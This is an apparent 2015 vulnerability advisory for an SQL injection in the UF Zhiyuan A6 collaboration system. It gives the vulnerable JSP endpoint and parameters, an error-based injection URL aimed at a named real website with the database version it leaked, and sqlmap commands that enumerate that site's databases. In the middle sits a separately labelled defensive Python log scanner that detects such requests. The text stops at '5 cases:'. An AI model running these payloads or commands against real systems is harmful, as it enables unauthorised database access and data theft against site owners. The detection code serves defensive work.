UF Zhiyuan A6 collaborative system: high-risk SQL injection vulnerability

2015-07-13T00:00:00
ID MYHACK58:62201564593
Type myhack58
Reporter 路人甲
Modified 2015-07-13T00:00:00

Description

The system is very widely deployed.

/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2

Both the DOCUMENTID and SIGNATUREID parameters are vulnerable to error-based injection.

A simple test method

http://www.ssepec.net/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27%20and%20(select%2 0 1%20from%2 0(select%20count(),concat(version(),floor(rand(0)2))x%20from%20information_schema. tables%20group%20by%20x)a)%2 3

javax.servlet.ServletException: Duplicate entry '5.0.41-community-nt1' for key 1
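An added example, not part of the original advisory: a log check that flags requests to the endpoint above whose DOCUMENTID or SIGNATUREID value is not a plain integer. The numeric-ID rule and the combined access-log format are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint and parameter names are taken from the advisory.
ENDPOINT = "/yyoa/HJ/iSignatureHtmlServer.jsp"
ID_PARAMS = {"DOCUMENTID", "SIGNATUREID"}

# Assumption: legitimate IDs are plain decimal integers, as in the
# advisory's sample request (DOCUMENTID=1, SIGNATUREID=2).
NUMERIC = re.compile(r"[0-9]{1,18}")

# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return sorted names of ID parameters whose decoded value is not numeric."""
    parts = urlsplit(target)
    if parts.path.lower() != ENDPOINT.lower():
        return []
    bad = set()
    # parse_qsl percent-decodes values, so %27 and %20 are seen as ' and space.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.upper() in ID_PARAMS and not NUMERIC.fullmatch(value):
            bad.add(name.upper())
    return sorted(bad)


def scan(log_lines):
    """Yield (client_ip, offending_params) for each flagged log line."""
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        bad = suspicious_params(m.group(1))
        if bad:
            yield line.split(" ", 1)[0], bad


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Jul/2015:10:00:01 +0800] "GET /yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 HTTP/1.1" 200 512',
    '198.51.100.7 - - [13/Jul/2015:10:00:09 +0800] "GET /yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2%27%20and%20(select%201)%23 HTTP/1.1" 500 2048',
    '203.0.113.5 - - [13/Jul/2015:10:00:15 +0800] "GET /yyoa/index.jsp?DOCUMENTID=abc HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for ip, params in scan(SAMPLE_LOG):
        print(ip, params)
```

A flagged request that also returned HTTP 500 matches the error-based behaviour shown in the ServletException above and is worth prioritising in triage.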

sqlmap run:

sqlmap.py -u "http://www.ssepec.net/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2" -p DOCUMENTID --dbms mysql

Vulnerability proof:

sqlmap.py -u "http://www.ssepec.net/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2" -p DOCUMENTID --dbms mysql --dbs

5 cases:
